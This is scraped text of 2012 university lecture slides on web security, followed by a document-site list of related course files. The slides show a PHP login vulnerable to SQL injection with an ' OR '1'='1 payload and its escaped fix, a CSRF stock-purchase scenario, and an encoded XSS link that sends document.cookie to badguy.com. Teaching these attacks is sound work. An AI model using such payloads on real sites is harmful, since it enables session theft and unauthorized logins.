security

iPhone Tracker http://petewarden.github.com/iPhoneTracker/

obvious threats Telnet FTP HTTP MySQL ...

suphp.org

HTTP/1.x 200 OK Date: Mon, 23 Apr 2012 13:00:00 EST Server: Apache/2 X-Powered-By: PHP/5.3.3 Expires: Thu, 23 Apr 1981 13:00:00 EST Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=5899f546557421d38d74b659e5bf384f; path=/ Set-Cookie: secret=12345 Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 261 Keep-Alive: timeout=1, max=100 Connection: Keep-Alive Content-Type: text/html

sgc.se

session hijacking physical access packet sniffing session fixation XSS ...

SSL

public-key crypto

http://ww.nuitari.de/crypto.html

Diffie-Hellman (DLP)

Radia Perlman

Radia Perlman

Radia Perlman

$sql = sprintf("SELECT uid FROM users WHERE username='%s' AND password='%s'", $_POST["username"], $_POST["password"]));

SELECT uid FROM users WHERE username='' AND password='' OR '1'='1'

$sql = sprintf("SELECT uid FROM users WHERE username='%s' AND password='%s'", mysql_real_escape_string($_POST["username"]), mysql_real_escape_string( $_POST["password"])));

SELECT uid FROM users WHERE username='' AND password='\' OR \'1\'=\'1'

CSRF 1. You log into etrade.com. 2. You then visit a bad guy’s website. 3. Bad guy’s site contains a link to http://etrade.com/buy.php?symbol=INFX.PK 4. You unwittingly buy the penny stock!

CSRF

or, really,

http://vulnerable.com/?foo=%3Cscript%3Edocument.location%3D'http%3A%2F%2Fbadguy.com%2Flog.php%3Fcookie %3D'%2Bdocument.cookie%3C%2Fscript%3E

2. vulnerable.com writes value of foo to its body. 3. badguy.com gets your cookies.

SEAS Design Fair Tue 5/1, 11am - 4pm

the end

path=/ Set-Cookie: secret=12345 - cs164

Apr 23, 2012 - Page 12. public-key crypto http://ww.nuitari.de/crypto.html. Page 13. Diffie-Hellman (DLP). Radia Perlman. Page 14. Radia Perlman. Page 15 ...
Download PDF
3MB Sizes 2 Downloads 218 Views
Report

Recommend Documents

path=/ Set-Cookie: secret=12345 - cs164
Apr 23, 2012 - obvious threats. Telnet. FTP. HTTP. MySQL ... Server: Apache/2. X-Powered-By: PHP/5.3.3. Expires: Thu, 23 Apr 1981 13:00:00 EST.
Untitled - cs164
High Performance MySQL. Page 12. partitioning. High Performance MySQL. Page 13. high availability. High Performance MySQL. Page 14. realtime apps ...
Specification - cs164
need a Mac for the course until Mon 3/19, but Xcode comes with iOS Simulator, which might prove handy for testing in the short term. If you do have a Mac, know ...
Specification - cs164
Computer Science 164: Mobile Software Engineering. Harvard College .... Log into your Bitbucket account and create a new, private repo as follows: □ Select ...
Syllabus - cs164
Computer Science 164: Mobile Software Engineering ... Description .... intend to use outside of the course (e.g., for a job) must be approved by the staff. ... Administrative Board and the outcome for some student is Admonish, Probation, ...
Evil Hangman - cs164
thereafter, you might also want to sign up for the iOS Developer Program at ... Because the course is part of the iOS Developer University Program, you will be ...
Mobile Software Engineering - cs164
singletons, factories, observers, ... Page 23. unit testing. PHPUnit, Selenium, ... Page 24. UX. Page 25. performance latency, caching, ... Page 26. source control git, subversion. Page 27. IDEs. Xcode, ... Page 28. PHP frameworks. CodeIgniter. Page
Specification - cs164
Fri. 2/3. Proposal. 2/6. Design Doc, Style Guide. 2/10. Beta. 2/24. Release ... or otherwise exposed) or lifting material from a book, website, or other ... Help is available throughout the week at http://help.cs164.net/, and we'll do our best to res
Untitled - cs164
web hosts. Bluehost. DreamHost. Go Daddy. Host Gator pair Networks ... Page 3. VPSes. DreamHost. Go Daddy. Host Gator. Linode pair Networks. Slicehost.
design patterns - cs164
sections labs design reviews, code reviews, office hours alphas new release cycle. Page 5. new release cycle. Page 6. workload. Page 7. project 1. Page 8 ...
Evil Hangman - cs164
thereafter, you might also want to sign up for the iOS Developer Program at ... Because the course is part of the iOS Developer University Program, you will be ...
lecture1/html/cs164/css/index.html
Video. 16. . 17. 18. 19.
iOS: Evil Hangman Walkthrough - cs164
Mar 21, 2012 - Property Lists. Equivalence. Classes. Protocols. Transitioning. Between. Views. Settings. iOS: Evil Hangman Walkthrough. CS164 Walkthrough ...
lecture1/html/cs164/css/index.html
lecture1/html/cs164/css/index.html. . 10. 11. . 12. 13. . 14. . 15. . 16. . 17.
lecture1/html/cs164/css/index.html
Syllabus. 24. ...... lecture1/html/mvc/8/application/views/homepage/lecture.php.
Evil Hangman - CS50 CDN - cs164
should be prompted to Create an Apple ID or Use an existing Apple ID. Review the explanation beneath each option, select the appropriate one, click Continue, then follow the on-‐screen prompts. If you plan to submit an app to Apple's App Store, whe
iOS: Evil Hangman Walkthrough - cs164
Mar 21, 2012 - for each word in set: determine equivalence class for word; add word to equivalence class; determine largest equivalence class; remove all ...
lecture7/Gestures/Gestures/AppDelegate.h // 1. // AppDelegate ... - cs164
111. 112. // listen for right swipe. 113. ... listen for left swipe. 118. swipeGesture ...... CGRect square = CGRectMake(0.0f, 0.0f, 10.0f, 60.0f);. 18. [[UIColor ...
iOS: XCode and Interface Builder - cs164
Mar 7, 2012 - +: class methods, sent to class, not object (e.g. alloc). Page 5. iOS: XCode and Interface. Builder. Tommy. MacWilliam. Objective-C. Review.
week Mon Tue Wed Thu Fri - cs164
Page 2 ... /UserExperience/Conceptual/MobileHIG/Characteristics/Characteristics.html ... /appleapplications/reference/SafariHTMLRef/Articles/MetaTags.html ...
Students' Choice of Web Apps - cs164
Students' Choice of Web Apps each milestone's ... Okay, for the sake of discussion, we again need to call you or your partner Alice and the other of you Bob.
iOS: XCode and Interface Builder - cs164
Mar 7, 2012 - iOS: XCode and Interface. Builder. Tommy. MacWilliam. Objective-C. Review. XCode. Interface. Builder. Outlets and. Actions. Delegates and.
week Mon Tue Wed Thu Fri - cs164
http://developer.apple.com/library/ios/documentation/UserExperience/Conceptual/MobileHIG/Characteristics/Characteristics.html ...
lecture2/html/mvc/9/application/controllers/homepage.php ... - cs164
lecture2/html/mvc/9/application/views/homepage/index.php. . 1. Labs. 2. Lectures. 3. Syllabus. 4. . 5.